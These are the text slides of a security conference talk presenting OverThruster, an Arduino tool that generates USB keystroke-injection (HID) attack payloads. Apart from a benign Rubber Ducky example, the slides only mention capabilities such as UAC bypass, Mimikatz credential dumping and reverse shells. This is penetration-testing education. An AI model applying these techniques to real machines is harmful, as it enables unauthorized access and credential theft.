Arduino based hid attacks by Brendan Hohenadel Why you should listen to me

Download 10.04 Mb.
Size10.04 Mb.

Arduino based HID Attacks

by Brendan Hohenadel

Why you should listen to me*

  • Cyber Forensic Analyst at U of G
  • I like to hack stuff
  • I’m cheap
  • I dream of Red Teaming
  • I have letters after my name: OSCP, OSCE, CISSP
  • I wrote OverThruster:
  • On Twitter @bhohenadel (sorry, no Mastadon)
  • *You shouldn’t listen to me. Now’s your chance for a smoke break. Go now.  I’ll pause and wait.

Presentation Schedule

  • Title Slide
  • Personal Introduction Slide
  • This Slide
  • Rest of the presentation

A Little History Lesson

USB Rubber Ducky

USB Ducky Scripts

DELAY 3000 GUI r DELAY 500 STRING notepad DELAY 500 ENTER DELAY 750 STRING Hello World!!! ENTER


Programmable HID USB

Keyboard Dongle by

Adrien Crenshaw aka

IronGeek at DefCon 18

  • Built on Teensy 2.0
    • too expensive
  • Looks suspicious…


Samy Kamkar

  • Modifies DNS
  • Teensy 3.1
    • Too expensive
  • Designed for OSX
  • Looks suspicious…

Lots of others

- Offensive Security’s Peensy

- NetHunter (Android phone based)

- Kautilya by Nikhil Mittal

- Lots more in GitHub, all based on Teensy

So I bought Teensy 3.1

  • Started learning Powershell
  • started making payloads
  • Discovered LED_STATUS
  • Still not happy about the cost...

Elie Bursztein at BlackHat 24

Elie Bursztein at BlackHat 24

AliExpress to the Rescue!

My Cost

Mini SS Micro Arduino (testing/keychain)


Pro Micro Arduino x10


USB Type A Connector x 10


USB case x 10




Cost per device


Testing, Learning, Testing, Learning

  • Arduino keyboard library is different than Teensy…
  • Arduino keyboard library is more limited than Teensy…
  • (these) Arduinos have no reset/program button like the Teensy…

OverThruster was Born

  • Inspired by the one of the greatest
  • Sci-Fi film ever made

  • Menu driven python script
  • ONLY standard python libraries
  • Generates Arduino sketches for
  • various payloads

  • Highly customizable
  • Multiple UAC bypass methods
  • Optional notification bubble to
  • distract the user

  • helper functions that work
  • with some of the payloads

Demo Time!!

  • How the tool works, a simple payload and the listerner
  • Poppin’ a shell
  • Mimikatz with UAC Bypass
  • Poppin’ a shell on OSX

Problems to still work out

  • NicoHood’s keyboard library isn’t detected properly in OSX
    • Maybe it is...
  • Need a Python version of netcat for windows users
  • Less dependency on timing/delays

Future Plans

  • Add SD Card/local storage functionality
  • Clean up the code/add comments
  • More payloads
  • FIND A SUITABLE CASE (maybe resin casting?)

Until my DIY is done...

  • 5 for $25
  • Arduino Pro Micro based
  • But no storage...


Or maybe a minute or two of awkward silence before I slowly walk away...

Share with your friends:

The database is protected by copyright © 2019
send message

    Main page